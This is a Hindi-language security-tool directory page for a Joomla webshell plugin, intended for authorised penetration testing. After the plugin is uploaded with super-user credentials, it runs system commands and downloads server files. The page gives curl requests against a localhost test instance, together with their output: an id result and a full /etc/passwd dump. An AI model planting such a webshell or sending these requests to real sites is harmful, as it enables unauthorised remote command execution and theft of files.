Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Joomla-webshell-plugin — Joomla वेबसाइट की पेंटेस्टिंग के लिए एक वेबशेल प्लगइन और इंटरैक्टिव शेल। | Kitploit
उपकरण/GitHubGitHub/p0dalirius/joomla-webshell-plugin
शोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubp0dalirius/joomla-webshell-plugin

Joomla-webshell-plugin

Joomla वेबसाइट की पेंटेस्टिंग के लिए एक वेबशेल प्लगइन और इंटरैक्टिव शेल।

62934 साल पहलेKitploit द्वारा समीक्षित
रिपॉजिटरी देखेंवेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RCE के लिए Joomla webshell plugin

Joomla वेबसाइट के pentesting के लिए एक webshell plugin और interactive shell।
GitHub release (latest by date) YouTube Channel Subscribers

विशेषताएँ

  • Joomla के लिए Webshell plugin।
  • ?action=exec के साथ एक API के माध्यम से सिस्टम कमांड निष्पादित करें।
  • ?action=download के साथ रिमोट सिस्टम से अपनी attacking machine पर फ़ाइलें डाउनलोड करें।

उपयोग

आवश्यकताएँ: आपके पास Joomla instance के super user account की credentials होनी चाहिए।

चरण 1: webshell plugin अपलोड करें

"System --> Extensions" पृष्ठ पर जाएँ, http://127.0.0.1:10080/administrator/index.php?option=com_installer&view=install पर, और "Upload Package File" पर क्लिक करें:

चरण 2.1: कमांड निष्पादित करना

अब आप action=exec&cmd=id के साथ http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php पर GET या POST request भेजकर कमांड निष्पादित कर सकते हैं:

$ curl -X POST 'http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","stderr":"","exec":"id"}

आप इसे ब्राउज़र से GET request के माध्यम से भी एक्सेस कर सकते हैं:

चरण 2.2: फ़ाइलें डाउनलोड करना

आप action=download&path=/etc/passwd के साथ http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php पर GET या POST request भेजकर रिमोट फ़ाइलें भी डाउनलोड कर सकते हैं:

$ curl -X POST 'http://127.0.0.1:10080/modules/mod_webshell/mod_webshell.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

आप ब्राउज़र से GET request के साथ रिमोट फ़ाइल भी डाउनलोड कर सकते हैं:

चरण 3: interactive console

जब आपका webshell सक्रिय हो, तो अब आप कमांड निष्पादित करने और रिमोट फ़ाइलें डाउनलोड करने के लिए interactive console.py का उपयोग कर सकते हैं।

https://user-images.githubusercontent.com/79218792/169823449-42289f27-70a0-460b-8f40-9cecda55e6f5.mp4

संदर्भ

  • https://docs.joomla.org/Special:MyLanguage/J3.x:Creating_a_simple_module/Developing_a_Basic_Module
  • https://docs.joomla.org/J4.x:Creating_a_Simple_Module
टूल डाउनलोड करें